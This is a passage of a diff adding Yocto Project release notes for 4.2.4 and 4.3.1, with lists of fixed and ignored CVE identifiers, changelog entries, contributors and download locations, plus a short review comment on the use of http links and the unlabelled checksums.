:cve:`2022-25258`, :cve:`2022-25375`, :cve:`2022-25636`, :cve_mitre:`2022-2585`, :cve_mitre:`2022-2586`, :cve_mitre:`2022-2588`, :cve:`2022-2590`, :cve_mitre:`2022-2602`, :cve:`2022-26365`, :cve:`2022-26373`, :cve:`2022-2639`, :cve:`2022-26490`, :cve:`2022-2663`, :cve:`2022-26966`, :cve:`2022-27223`, :cve:`2022-27666`, :cve:`2022-27672`, :cve:`2022-2785`, :cve:`2022-27950`, :cve:`2022-28356`, :cve:`2022-28388`, :cve:`2022-28389`, :cve:`2022-28390`, :cve:`2022-2873`, :cve:`2022-28796`, :cve:`2022-28893`, :cve:`2022-2905`, :cve:`2022-29156`, :cve:`2022-2938`, :cve:`2022-29581`, :cve:`2022-29582`, :cve:`2022-2959`, :cve:`2022-2964`, :cve:`2022-2977`, :cve:`2022-2978`, :cve:`2022-29900`, :cve:`2022-29901`, :cve:`2022-2991`, :cve:`2022-29968`, 
:cve:`2022-3028`, :cve:`2022-30594`, :cve:`2022-3061`, :cve:`2022-3077`, :cve:`2022-3078`, :cve:`2022-3103`, :cve:`2022-3104`, :cve:`2022-3105`, :cve:`2022-3106`, :cve:`2022-3107`, :cve:`2022-3108`, :cve:`2022-3110`, :cve:`2022-3111`, :cve:`2022-3112`, :cve:`2022-3113`, :cve:`2022-3114`, :cve:`2022-3115`, :cve:`2022-3169`, :cve:`2022-3170`, :cve:`2022-3176`, :cve:`2022-3202`, :cve:`2022-32250`, :cve:`2022-32296`, :cve:`2022-3239`, :cve:`2022-32981`, :cve:`2022-3303`, :cve:`2022-3344`, :cve:`2022-33740`, :cve:`2022-33741`, :cve:`2022-33742`, :cve:`2022-33743`, :cve:`2022-33744`, :cve:`2022-33981`, :cve:`2022-3424`, :cve:`2022-3435`, :cve:`2022-34494`, :cve:`2022-34495`, :cve:`2022-34918`, :cve:`2022-3521`, :cve:`2022-3522`, :cve:`2022-3524`, :cve:`2022-3526`, :cve:`2022-3531`, :cve:`2022-3532`, :cve:`2022-3534`, :cve:`2022-3535`, :cve:`2022-3541`, :cve:`2022-3542`, :cve:`2022-3543`, :cve:`2022-3545`, :cve:`2022-3564`, :cve:`2022-3565`, :cve:`2022-3577`, :cve:`2022-3586`, :cve:`2022-3594`, :cve:`2022-3595`, :cve:`2022-36123`, :cve:`2022-3619`, :cve:`2022-3621`, :cve:`2022-3623`, :cve:`2022-3624`, :cve:`2022-3625`, :cve:`2022-3628`, :cve:`2022-36280`, :cve:`2022-3629`, :cve:`2022-3630`, :cve:`2022-3633`, :cve:`2022-3635`, :cve:`2022-3636`, :cve:`2022-3640`, :cve:`2022-3643`, :cve:`2022-3646`, :cve:`2022-3649`, :cve:`2022-36879`, :cve:`2022-36946`, :cve:`2022-3707`, :cve:`2022-38457`, :cve:`2022-3903`, :cve:`2022-3910`, :cve:`2022-39188`, :cve:`2022-39189`, :cve:`2022-39190`, :cve:`2022-3977`, :cve:`2022-39842`, :cve:`2022-40133`, :cve:`2022-40307`, :cve:`2022-40476`, :cve:`2022-40768`, :cve:`2022-4095`, :cve:`2022-40982`, :cve:`2022-41218`, :cve:`2022-41222`, :cve:`2022-4127`, :cve:`2022-4128`, :cve:`2022-4129`, :cve:`2022-4139`, :cve:`2022-41674`, :cve:`2022-41849`, :cve:`2022-41850`, :cve:`2022-41858`, :cve:`2022-42328`, :cve:`2022-42329`, :cve:`2022-42432`, :cve:`2022-4269`, :cve:`2022-42703`, :cve:`2022-42719`, :cve:`2022-42720`, :cve:`2022-42721`, 
:cve:`2022-42722`, :cve:`2022-42895`, :cve:`2022-42896`, :cve:`2022-43750`, :cve:`2022-4378`, :cve:`2022-4379`, :cve:`2022-4382`, :cve:`2022-43945`, :cve:`2022-45869`, :cve:`2022-45886`, :cve:`2022-45887`, :cve:`2022-45919`, :cve:`2022-45934`, :cve:`2022-4662`, :cve:`2022-4696`, :cve:`2022-4744`, :cve:`2022-47518`, :cve:`2022-47519`, :cve:`2022-47520`, :cve:`2022-47521`, :cve:`2022-47929`, :cve:`2022-47938`, :cve:`2022-47939`, :cve:`2022-47940`, :cve:`2022-47941`, :cve:`2022-47942`, :cve:`2022-47943`, :cve:`2022-47946`, :cve:`2022-4842`, :cve:`2022-48423`, :cve:`2022-48424`, :cve:`2022-48425`, :cve:`2022-48502`, :cve:`2023-0030`, :cve:`2023-0045`, :cve:`2023-0047`, :cve:`2023-0122`, :cve:`2023-0160`, :cve:`2023-0179`, :cve:`2023-0210`, :cve:`2023-0240`, :cve:`2023-0266`, :cve:`2023-0386`, :cve:`2023-0394`, :cve:`2023-0458`, :cve:`2023-0459`, :cve:`2023-0461`, :cve:`2023-0468`, :cve:`2023-0469`, :cve:`2023-0590`, :cve:`2023-0615`, :cve_mitre:`2023-1032`, :cve:`2023-1073`, :cve:`2023-1074`, :cve:`2023-1076`, :cve:`2023-1077`, :cve:`2023-1078`, :cve:`2023-1079`, :cve:`2023-1095`, :cve:`2023-1118`, :cve:`2023-1192`, :cve:`2023-1194`, :cve:`2023-1195`, :cve:`2023-1206`, :cve:`2023-1249`, :cve:`2023-1252`, :cve:`2023-1281`, :cve:`2023-1295`, :cve:`2023-1380`, :cve:`2023-1382`, :cve:`2023-1390`, :cve:`2023-1513`, :cve:`2023-1582`, :cve:`2023-1583`, :cve:`2023-1611`, :cve:`2023-1637`, :cve:`2023-1652`, :cve:`2023-1670`, :cve:`2023-1829`, :cve:`2023-1838`, :cve:`2023-1855`, :cve:`2023-1859`, :cve:`2023-1872`, :cve:`2023-1989`, :cve:`2023-1990`, :cve:`2023-1998`, :cve:`2023-2002`, :cve:`2023-2006`, :cve:`2023-2007`, :cve:`2023-2008`, :cve:`2023-2019`, :cve:`2023-20569`, :cve:`2023-20588`, :cve:`2023-20593`, :cve:`2023-20928`, :cve:`2023-20938`, :cve:`2023-21102`, :cve:`2023-21106`, :cve:`2023-2124`, :cve:`2023-21255`, :cve:`2023-2156`, :cve:`2023-2162`, :cve:`2023-2163`, :cve:`2023-2166`, :cve:`2023-2177`, :cve:`2023-2194`, :cve:`2023-2235`, :cve:`2023-2236`, 
:cve:`2023-2248`, :cve:`2023-2269`, :cve:`2023-22995`, :cve:`2023-22996`, :cve:`2023-22997`, :cve:`2023-22998`, :cve:`2023-22999`, :cve:`2023-23000`, :cve:`2023-23001`, :cve:`2023-23002`, :cve:`2023-23003`, :cve:`2023-23004`, :cve:`2023-23006`, :cve:`2023-23454`, :cve:`2023-23455`, :cve:`2023-23559`, :cve:`2023-23586`, :cve:`2023-2430`, :cve:`2023-2483`, :cve:`2023-25012`, :cve:`2023-2513`, :cve:`2023-25775`, :cve:`2023-2598`, :cve:`2023-26544`, :cve:`2023-26545`, :cve:`2023-26605`, :cve:`2023-26606`, :cve:`2023-26607`, :cve:`2023-28327`, :cve:`2023-28328`, :cve:`2023-28410`, :cve:`2023-28464`, :cve:`2023-28466`, :cve:`2023-2860`, :cve:`2023-28772`, :cve:`2023-28866`, :cve:`2023-2898`, :cve:`2023-2985`, :cve:`2023-3006`, :cve:`2023-30456`, :cve:`2023-30772`, :cve:`2023-3090`, :cve:`2023-3106`, :cve:`2023-3111`, :cve:`2023-3117`, :cve:`2023-31248`, :cve:`2023-3141`, :cve:`2023-31436`, :cve:`2023-3159`, :cve:`2023-3161`, :cve:`2023-3212`, :cve:`2023-3220`, :cve:`2023-32233`, :cve:`2023-32247`, :cve:`2023-32248`, :cve:`2023-32250`, :cve:`2023-32252`, :cve:`2023-32254`, :cve:`2023-32257`, :cve:`2023-32258`, :cve:`2023-32269`, :cve:`2023-3268`, :cve:`2023-3269`, :cve:`2023-3312`, :cve:`2023-3317`, :cve:`2023-33203`, :cve:`2023-33250`, :cve:`2023-33288`, :cve:`2023-3338`, :cve:`2023-3355`, :cve:`2023-3357`, :cve:`2023-3358`, :cve:`2023-3359`, :cve:`2023-3389`, :cve:`2023-3390`, :cve:`2023-33951`, :cve:`2023-33952`, :cve:`2023-34255`, :cve:`2023-34256`, :cve:`2023-34319`, :cve:`2023-3439`, :cve:`2023-35001`, :cve:`2023-3567`, :cve:`2023-35788`, :cve:`2023-35823`, :cve:`2023-35824`, :cve:`2023-35826`, :cve:`2023-35828`, :cve:`2023-35829`, :cve:`2023-3609`, :cve:`2023-3610`, :cve:`2023-3611`, :cve:`2023-37453`, :cve:`2023-3772`, :cve:`2023-3773`, :cve:`2023-3776`, :cve:`2023-3777`, :cve:`2023-3812`, :cve:`2023-38409`, :cve:`2023-38426`, :cve:`2023-38427`, :cve:`2023-38428`, :cve:`2023-38429`, :cve:`2023-38430`, :cve:`2023-38431`, :cve:`2023-38432`, :cve:`2023-3863`, 
:cve_mitre:`2023-3865`, :cve_mitre:`2023-3866`, :cve_mitre:`2023-3867`, :cve:`2023-4004`, :cve:`2023-4015`, :cve:`2023-40283`, :cve:`2023-4128`, :cve:`2023-4132`, :cve:`2023-4147`, :cve:`2023-4155`, :cve:`2023-4194`, :cve:`2023-4206`, :cve:`2023-4207`, :cve:`2023-4208`, :cve:`2023-4273`, :cve:`2023-42752`, :cve:`2023-42753`, :cve:`2023-4385`, :cve:`2023-4387`, :cve:`2023-4389`, :cve:`2023-4394`, :cve:`2023-4459`, :cve:`2023-4569`, :cve:`2023-4611` and :cve:`2023-4623`
+- nghttp2: Fix :cve:`2023-35945`
+- openssl: Fix :cve:`2023-2975`, :cve:`2023-3446`, :cve:`2023-3817`, :cve:`2023-4807` and :cve:`2023-5363`
+- pixman: Ignore :cve:`2023-37769`
+- procps: Fix :cve:`2023-4016`
+- python3-git: Fix :cve:`2023-40267`, :cve:`2023-40590` and :cve:`2023-41040`
+- python3-pygments: Fix :cve:`2022-40896`
+- python3-urllib3: Fix :cve:`2023-43804` and :cve:`2023-45803`
+- python3: Fix :cve:`2023-24329` and :cve:`2023-40217`
+- qemu: Fix :cve:`2023-3180`, :cve:`2023-3354` and :cve:`2023-42467`
+- qemu: Ignore :cve:`2023-2680`
+- screen: Fix :cve:`2023-24626`
+- shadow: Fix :cve_mitre:`2023-4641`
+- tiff: Fix :cve:`2023-40745` and :cve:`2023-41175`
+- vim: Fix :cve:`2023-3896`, :cve:`2023-4733`, :cve:`2023-4734`, :cve:`2023-4735`, :cve:`2023-4736`, :cve:`2023-4738`, :cve:`2023-4750`, :cve:`2023-4752`, :cve:`2023-4781`, :cve:`2023-5441` and :cve:`2023-5535`
+- webkitgtk: Fix :cve:`2023-32435` and :cve:`2023-32439`
+- xserver-xorg: Fix :cve:`2023-5367` and :cve:`2023-5380`
+
+
+Fixes in Yocto-4.2.4
+~~~~~~~~~~~~~~~~~~~~
+
+- README: Update to point to new contributor guide
+- README: fix mail address in git example command
+- SECURITY.md: Add file
+- avahi: handle invalid service types gracefully
+- bind: upgrade to 9.18.19
+- bitbake.conf: add bunzip2 in :term:`HOSTTOOLS`
+- bitbake: Fix disk space monitoring on cephfs
+- bitbake: SECURITY.md: add file
+- brief-yoctoprojectqs: use new CDN mirror for sstate
+- bsp-guide: bsp.rst: replace reference to wiki
+- bsp-guide: bsp: skip Intel machines no longer supported in Poky
+- build-appliance-image: Update to mickledore head revision
+- build-sysroots: Add :term:`SUMMARY` field
+- build-sysroots: Ensure dependency chains are minimal
+- build-sysroots: target or native sysroot population need to be selected explicitly
+- buildtools-tarball: Add libacl
+- busybox: Set PATH in syslog initscript
+- busybox: remove coreutils dependency in busybox-ptest
+- cmake.bbclass: fix allarch override syntax
+- cml1: Fix KCONFIG_CONFIG_COMMAND not conveyed fully in do_menuconfig
+- contributor-guide/style-guide: Add a note about task idempotence
+- contributor-guide/style-guide: Refer to recipes, not packages
+- contributor-guide: deprecate "Accepted" patch status
+- contributor-guide: discourage marking patches as Inappropriate
+- contributor-guide: recipe-style-guide: add Upstream-Status
+- contributor-guide: recipe-style-guide: add more patch tagging examples
+- contributor-guide: recipe-style-guide: add section about CVE patches
+- contributor-guide: style-guide: discourage using Pending patch status
+- core-image-ptest: Define a fallback for :term:`SUMMARY` field
+- cve-check: add CVSS vector string to CVE database and reports
+- cve-check: don't warn if a patch is remote
+- cve-check: slightly more verbose warning when adding the same package twice
+- cve-check: sort the package list in the JSON report
+- cve-exclusion_6.1.inc: update for 6.1.57
+- dbus: add additional entries to :term:`CVE_PRODUCT`
+- dbus: upgrade to 1.14.10
+- dev-manual: add security team processes
+- dev-manual: disk-space: improve wording for obsolete sstate cache files
+- dev-manual: disk-space: mention faster "find" command to trim sstate cache
+- dev-manual: fix testimage usage instructions
+- dev-manual: layers: Add notes about layer.conf
+- dev-manual: licenses: mention :term:`SPDX` for license compliance
+- dev-manual: new-recipe.rst fix inconsistency with contributor guide
+- dev-manual: new-recipe.rst: add missing parenthesis to "Patching Code" section
+- dev-manual: new-recipe.rst: replace reference to wiki
+- dev-manual: remove unsupported :term: markup inside markup
+- dev-manual: start.rst: remove obsolete reference
+- ell: upgrade to 0.58
+- externalsrc: fix dependency chain issues
+- ffmpeg: upgrade to 5.1.3
+- ffmpeg: avoid neon on unsupported machines
+- file: fix call to localtime_r()
+- file: upgrade to 5.45
+- fontcache.bbclass: avoid native recipes depending on target fontconfig
+- gcc-crosssdk: ignore MULTILIB_VARIANTS in signature computation
+- gcc-runtime: remove bashism
+- gcc: backport a fix for ICE caused by CVE-2023-4039.patch
+- gcc: depend on zstd
+- gdb: fix :term:`RDEPENDS` for PACKAGECONFIG[tui]
+- glib-2.0: libelf has a configure option now, specify it
+- glibc: stable 2.37 branch updates
+- gnupg: Fix reproducibility failure
+- gnupg: upgrade to 2.4.3
+- go: upgrade to 1.20.7
+- graphene: fix runtime detection of IEEE754 behaviour
+- gstreamer: upgrade to 1.22.6
+- gtk4: upgrade to 4.10.5
+- gzip: upgrade to 1.13
+- igt-gpu-tools: do not write shortened git commit hash into binaries
+- inetutils: don't guess target paths
+- inetutils: remove obsolete cruft from do_configure
+- insane.bbclass: Count raw bytes in shebang-size
+- kernel.bbclass: Add force flag to rm calls
+- lib/package_manager: Improve repo artefact filtering
+- libc-test: Run as non-root user
+- libconvert-asn1-perl: upgrade to 0.34
+- libevent: fix patch Upstream-Status
+- libgudev: explicitly disable tests and vapi
+- librepo: upgrade to 1.15.2
+- librsvg: upgrade to 2.54.6
+- libsndfile1: upgrade to 1.2.2
+- libsoup-2.4: Only specify --cross-file when building for target
+- libsoup-2.4: update :term:`PACKAGECONFIG`
+- libx11: upgrade to 1.8.7
+- libxkbcommon: add :term:`CVE_PRODUCT`
+- libxpm: upgrade to 3.5.17
+- linux-firmware: add firmware files for NXP BT chipsets
+- linux-firmware: package Dragonboard 845c sensors DSP firmware
+- linux-firmware: package audio topology for Lenovo X13s
+- linux-firmware: upgrade to 20230804
+- linux-yocto/5.15: update to v5.15.133
+- linux-yocto/6.1: fix CONFIG_F2FS_IO_TRACE configuration warning
+- linux-yocto/6.1: fix IRQ-80 warnings
+- linux-yocto/6.1: fix uninitialized read in nohz_full/isolcpus setup
+- linux-yocto/6.1: tiny: fix arm 32 boot
+- linux-yocto/6.1: update to v6.1.57
+- linux-yocto: add script to generate kernel :term:`CVE_CHECK_IGNORE` entries
+- linux-yocto: make sure the pahole-native available before do_kernel_configme
+- linux/cve-exclusion: add generated CVE_CHECK_IGNOREs
+- linux/generate-cve-exclusions: fix mishandling of boundary values
+- linux/generate-cve-exclusions: print the generated time in UTC
+- manuals: add new contributor guide
+- manuals: correct "yocto-linux" by "linux-yocto"
+- mdadm: Disable further tests due to intermittent failures
+- mdadm: skip running 04update-uuid and 07revert-inplace testcases
+- migration-guides: add release notes for 4.0.12
+- migration-guides: add release notes for 4.0.13
+- migration-guides: add release notes for 4.2.3
+- mpfr: upgrade to 4.2.1
+- multilib.conf: explicitly make MULTILIB_VARIANTS vardeps on MULTILIBS
+- nativesdk-intercept: Fix bad intercept chgrp/chown logic
+- nettle: avoid neon on unsupported machines
+- oe-depends-dot: improve '-w' behavior
+- oeqa dnf_runtime.py: fix HTTP server IP address and port
+- oeqa selftest context.py: remove warning from missing meta-selftest
+- oeqa selftest context.py: whitespace fix
+- oeqa/concurrencytest: Remove invalid buffering option
+- oeqa/selftest/context.py: check git command return values
+- oeqa/selftest/wic: Improve assertTrue calls
+- oeqa/selftest: Fix broken symlink removal handling
+- oeqa/utils/gitarchive: Handle broken commit counts in results repo
+- openssl: upgrade to 3.1.4
+- openssl: build and install manpages only if they are enabled
+- openssl: ensure all ptest fails are caught
+- openssl: parallelize tests
+- overview: Add note about non-reproducibility side effects
+- packages.bbclass: Correct the check for conflicts with renamed packages
+- pango: explictly enable/disable libthai
+- patch.py: use --absolute-git-dir instead of --show-toplevel to retrieve gitdir
+- pixman: Remove duplication of license MIT
+- pixman: avoid neon on unsupported machines
+- poky.conf: bump version for 4.2.4 release
+- profile-manual: aesthetic cleanups
+- pseudo: Fix to work with glibc 2.38
+- ptest: report tests that were killed on timeout
+- python3-git: upgrade to 3.1.37
+- python3-urllib3: update to v1.26.18
+- python3: upgrade to 3.11.5
+- qemu: fix "Bad FPU state detected" fault on qemu-system-i386
+- ref-manual: Fix :term:`PACKAGECONFIG` term and add an example
+- ref-manual: Warn about :term:`COMPATIBLE_MACHINE` skipping native recipes
+- ref-manual: point outdated link to the new location
+- ref-manual: releases.svg: Scarthgap is now version 5.0
+- ref-manual: system-requirements: update supported distros
+- ref-manual: variables: add :term:`RECIPE_SYSROOT` and :term:`RECIPE_SYSROOT_NATIVE`
+- ref-manual: variables: add :term:`TOOLCHAIN_OPTIONS` variable
+- ref-manual: variables: add example for :term:`SYSROOT_DIRS` variable
+- ref-manual: variables: provide no-match example for :term:`COMPATIBLE_MACHINE`
+- resulttool/report: Avoid divide by zero
+- runqemu: check permissions of available render nodes as well as their presence
+- screen: upgrade to 4.9.1
+- scripts/create-pull-request: update URLs to git repositories
+- sdk-manual: appendix-obtain: improve and update descriptions
+- sdk-manual: extensible.rst: fix multiple formatting issues
+- shadow: fix patch Upstream-Status
+- strace: parallelize ptest
+- sudo: upgrade to 1.9.15p2
+- systemd-bootchart: musl fixes have been rejected upstream
+- systemd: backport patch to fix warning in systemd-vconsole-setup
+- tar: upgrade to 1.35
+- tcl: Add a way to skip ptests
+- tcl: prevent installing another copy of tzdata
+- template: fix typo in section header
+- test-manual: reproducible-builds: stop mentioning LTO bug
+- uboot-extlinux-config.bbclass: fix missed override syntax migration
+- vim: upgrade to 9.0.2048
+- vim: update obsolete comment
+- wayland-utils: add libdrm :term:`PACKAGECONFIG`
+- weston-init: fix init code indentation
+- weston-init: remove misleading comment about udev rule
+- wic: bootimg-partition: Fix file name in debug message
+- wic: fix wrong attempt to create file system in upartitioned regions
+- wireless-regdb: upgrade to 2023.09.01
+- xz: upgrade to 5.4.4
+- yocto-uninative: Update to 4.2 for glibc 2.38
+- yocto-uninative: Update to 4.3
+
+
+Known Issues in Yocto-4.2.4
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+- N/A
+
+
+Contributors to Yocto-4.2.4
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+- Alberto Planas
+- Alexander Kanavin
+- Alexis Lothoré
+- Antoine Lubineau
+- Anuj Mittal
+- Archana Polampalli
+- Arne Schwerdt
+- BELHADJ SALEM Talel
+- Benjamin Bara
+- Bruce Ashfield
+- Chen Qi
+- Colin McAllister
+- Daniel Semkowicz
+- Dmitry Baryshkov
+- Eilís 'pidge' Ní Fhlannagáin
+- Emil Kronborg Andersen
+- Etienne Cordonnier
+- Jaeyoon Jung
+- Jan Garcia
+- Joe Slater
+- Joshua Watt
+- Julien Stephan
+- Kai Kang
+- Khem Raj
+- Lee Chee Yang
+- Markus Niebel
+- Markus Volk
+- Marta Rybczynska
+- Martijn de Gouw
+- Martin Jansa
+- Michael Halstead
+- Michael Opdenacker
+- Mikko Rapeli
+- Mingli Yu
+- Narpat Mali
+- Otavio Salvador
+- Ovidiu Panait
+- Peter Kjellerstedt
+- Peter Marko
+- Peter Suti
+- Poonam Jadhav
+- Quentin Schulz
+- Richard Purdie
+- Robert P. J. Day
+- Roland Hieber
+- Ross Burton
+- Ryan Eatmon
+- Sakib Sajal
+- Samantha Jalabert
+- Sanjana
+- Sanjay Chitroda
+- Sean Nyekjaer
+- Siddharth Doshi
+- Soumya Sambu
+- Stefan Tauner
+- Steve Sakoman
+- Tan Wen Yan
+- Tom Hochstein
+- Trevor Gamblin
+- Vijay Anusuri
+- Wang Mingyu
+- Xiangyu Chen
+- Yash Shinde
+- Yoann Congal
+- Yogita Urade
+- Yuta Hayama
+
+
+Repositories / Downloads for Yocto-4.2.4
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+poky
+
+- Repository Location: :yocto_git:`/poky`
+- Branch: :yocto_git:`mickledore </poky/log/?h=mickledore>`
+- Tag: :yocto_git:`yocto-4.2.4 </poky/log/?h=yocto-4.2.4>`
+- Git Revision: :yocto_git:`7235399a86b134e57d5eb783d7f1f57ca0439ae5 </poky/commit/?id=7235399a86b134e57d5eb783d7f1f57ca0439ae5>`
+- Release Artefact: poky-7235399a86b134e57d5eb783d7f1f57ca0439ae5
+- sha: 3d56bb4232ab29ae18249529856f0e638c50c764fc495d6beb1ecd295fa5e5e3
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.2.4/poky-7235399a86b134e57d5eb783d7f1f57ca0439ae5.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.2.4/poky-7235399a86b134e57d5eb783d7f1f57ca0439ae5.tar.bz2
+
+openembedded-core
+
+- Repository Location: :oe_git:`/openembedded-core`
+- Branch: :oe_git:`mickledore </openembedded-core/log/?h=mickledore>`
+- Tag: :oe_git:`yocto-4.2.4 </openembedded-core/log/?h=yocto-4.2.4>`
+- Git Revision: :oe_git:`23b5141400b2c676c806df3308f023f7c04e34e0 </openembedded-core/commit/?id=23b5141400b2c676c806df3308f023f7c04e34e0>`
+- Release Artefact: oecore-23b5141400b2c676c806df3308f023f7c04e34e0
+- sha: 152f4ee3cdd2e159f6bd34b01d517de44dfe670d35a5e3c84cc32ee7842d9741
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.2.4/oecore-23b5141400b2c676c806df3308f023f7c04e34e0.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.2.4/oecore-23b5141400b2c676c806df3308f023f7c04e34e0.tar.bz2
+
+meta-mingw
+
+- Repository Location: :yocto_git:`/meta-mingw`
+- Branch: :yocto_git:`mickledore </meta-mingw/log/?h=mickledore>`
+- Tag: :yocto_git:`yocto-4.2.4 </meta-mingw/log/?h=yocto-4.2.4>`
+- Git Revision: :yocto_git:`d87d4f00b9c6068fff03929a4b0f231a942d3873 </meta-mingw/commit/?id=d87d4f00b9c6068fff03929a4b0f231a942d3873>`
+- Release Artefact: meta-mingw-d87d4f00b9c6068fff03929a4b0f231a942d3873
+- sha: 8036847cf5bf3da9db4bad13aac9080d559848679f0ae03694d55a576bcaf75f
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.2.4/meta-mingw-d87d4f00b9c6068fff03929a4b0f231a942d3873.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.2.4/meta-mingw-d87d4f00b9c6068fff03929a4b0f231a942d3873.tar.bz2
+
+bitbake
+
+- Repository Location: :oe_git:`/bitbake`
+- Branch: :oe_git:`2.4 </bitbake/log/?h=2.4>`
+- Tag: :oe_git:`yocto-4.2.4 </bitbake/log/?h=yocto-4.2.4>`
+- Git Revision: :oe_git:`c7e094ec3beccef0bbbf67c100147c449d9c6836 </bitbake/commit/?id=c7e094ec3beccef0bbbf67c100147c449d9c6836>`
+- Release Artefact: bitbake-c7e094ec3beccef0bbbf67c100147c449d9c6836
+- sha: 6a35a62bee3446cd0f9e0ec1de9b8f60fc396109075b37d7c4a1f2e6d63271c6
+- Download Locations:
+ http://downloads.yoctoproject.org/releases/yocto/yocto-4.2.4/bitbake-c7e094ec3beccef0bbbf67c100147c449d9c6836.tar.bz2
+ http://mirrors.kernel.org/yocto/yocto/yocto-4.2.4/bitbake-c7e094ec3beccef0bbbf67c100147c449d9c6836.tar.bz2
+
+yocto-docs
+
+- Repository Location: :yocto_git:`/yocto-docs`
+- Branch: :yocto_git:`mickledore </yocto-docs/log/?h=mickledore>`
+- Tag: :yocto_git:`yocto-4.2.4 </yocto-docs/log/?h=yocto-4.2.4>`
+- Git Revision: :yocto_git:`91a29ca94314c87fd3dc68601cd4932bdfffde35 </yocto-docs/commit/?id=91a29ca94314c87fd3dc68601cd4932bdfffde35>`
+
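Review bot: In each "Repositories / Downloads" entry the download locations are plain http:// URLs, and the checksum beside them is labelled only "sha:", so the reader has to infer the algorithm (the values are 64 hex characters, the length of a SHA-256 digest) and fetches the artefact over an unauthenticated channel. Suggest naming the algorithm in the field label and listing https:// locations if the hosts serve them. Separately, the "Ignore" entries in the security list (pixman :cve:`2023-37769`, qemu :cve:`2023-2680`) carry no reason; one clause on why each is ignored would let downstream users judge whether the exclusion holds for their build.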
diff --git a/poky/documentation/migration-guides/release-notes-4.3.1.rst b/poky/documentation/migration-guides/release-notes-4.3.1.rst
new file mode 100644
index 0000000000..cea9c538a2
--- /dev/null
+++ b/poky/documentation/migration-guides/release-notes-4.3.1.rst
@@ -0,0 +1,237 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+Release notes for Yocto-4.3.1 (Nanbield)
+----------------------------------------
+
+Security Fixes in Yocto-4.3.1
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+- libsndfile1: Fix :cve:`2022-33065`
+- libxml2: Ignore :cve:`2023-45322`
+- linux-yocto/6.1: Ignore :cve:`2020-27418`, :cve:`2023-31085`, :cve_mitre:`2023-34324`, :cve:`2023-39189`, :cve:`2023-39192`, :cve:`2023-39193`, :cve:`2023-39194`, :cve:`2023-4244`, :cve:`2023-42754`, :cve:`2023-42756`, :cve:`2023-44466`, :cve:`2023-4563`, :cve:`2023-45862`, :cve:`2023-45863`, :cve:`2023-45871`, :cve:`2023-45898`, :cve:`2023-4732`, :cve:`2023-5158`, :cve:`2023-5197` and :cve:`2023-5345`
+- linux-yocto/6.5: Ignore :cve:`2020-27418`, :cve:`2023-1193`, :cve:`2023-39191`, :cve:`2023-39194`, :cve:`2023-40791`, :cve:`2023-44466`, :cve:`2023-45862`, :cve:`2023-45863`, :cve:`2023-4610` and :cve:`2023-4732`
+- openssl: Fix :cve:`2023-5363`
+- pixman: Ignore :cve:`2023-37769`
+- vim: Fix :cve:`2023-46246`
+- zlib: Ignore :cve:`2023-45853`
+
+
+Fixes in Yocto-4.3.1
+~~~~~~~~~~~~~~~~~~~~
+
+- baremetal-helloworld: Pull in fix for race condition on x86-64
+- base: Ensure recipes using mercurial-native have certificates
+- bb-matrix-plot.sh: Show underscores correctly in labels
+- bin_package.bbclass: revert "Inhibit the default dependencies"
+- bitbake: SECURITY.md: add file
+- brief-yoctoprojectqs: use new CDN mirror for sstate
+- bsp-guide: bsp.rst: update beaglebone example
+- bsp-guide: bsp: skip Intel machines no longer supported in Poky
+- build-appliance-image: Update to nanbield head revision
+- contributor-guide: add patchtest section
+- contributor-guide: clarify patchtest usage
+- cve-check: don't warn if a patch is remote
+- cve-check: slightly more verbose warning when adding the same package twice
+- cve-check: sort the package list in the JSON report
+- dev-manual: add security team processes
+- dev-manual: extend the description of CVE patch preparation
+- dev-manual: layers: Add notes about layer.conf
+- dev-manual: new-recipe.rst: add missing parenthesis to "Patching Code" section
+- dev-manual: start.rst: remove obsolete reference
+- dev-manual: wic: update "wic list images" output
+- docs: add support for nanbield (4.3) release
+- documentation.conf: drop SERIAL_CONSOLES_CHECK
+- ell: Upgrade to 0.59
+- glib-2.0: Remove unnecessary assignement
+- goarch: Move Go architecture mapping to a library
+- kernel-arch: drop CCACHE from :term:`KERNEL_STRIP` definition
+- kernel.bbclass: Use strip utility used for kernel build in do_package
+- layer.conf: Switch layer to nanbield series only
+- libsdl2: upgrade to 2.28.4
+- linux-yocto: make sure the pahole-native available before do_kernel_configme
+- llvm: Upgrade to 17.0.3
+- machine: drop obsolete SERIAL_CONSOLES_CHECK
+- manuals: correct "yocto-linux" by "linux-yocto"
+- manuals: improve description of :term:`CVE_STATUS` and :term:`CVE_STATUS_GROUPS`
+- manuals: Remove references to apm in :term:`MACHINE_FEATURES`
+- manuals: update linux-yocto append examples
+- manuals: update list of supported machines
+- migration-4.3: additional migration items
+- migration-4.3: adjustments to existing text
+- migration-4.3: remove some unnecessary items
+- migration-guides: QEMU_USE_SLIRP variable removed
+- migration-guides: add BitBake changes
+- migration-guides: add debian 12 to newly supported distros
+- migration-guides: add kernel notes
+- migration-guides: add testing notes
+- migration-guides: add utility notes
+- migration-guides: edgerouter machine removed
+- migration-guides: enabling :term:`SPDX` only for Poky, not a global default
+- migration-guides: fix empty sections
+- migration-guides: further updates for 4.3
+- migration-guides: further updates for release 4.3
+- migration-guides: git recipes reword
+- migration-guides: mention CDN
+- migration-guides: mention LLVM 17
+- migration-guides: mention runqemu change in serial port management
+- migration-guides: packaging changes
+- migration-guides: remove SERIAL_CONSOLES_CHECK
+- migration-guides: remove non-notable change
+- migration-guides: updates for 4.3
+- oeqa/selftest/debuginfod: improve selftest
+- oeqa/selftest/devtool: abort if a local workspace already exist
+- oeqa/ssh: Handle SSHCall timeout error code
+- openssl: Upgrade to 3.1.4
+- overview-manual: concepts: Add Bitbake Tasks Map
+- patchtest-send-results: add In-Reply-To
+- patchtest-send-results: check max line length, simplify responses
+- patchtest-send-results: fix sender parsing
+- patchtest-send-results: improve subject line
+- patchtest-send-results: send results to submitter
+- patchtest/selftest: add XSKIP, update test files
+- patchtest: disable merge test
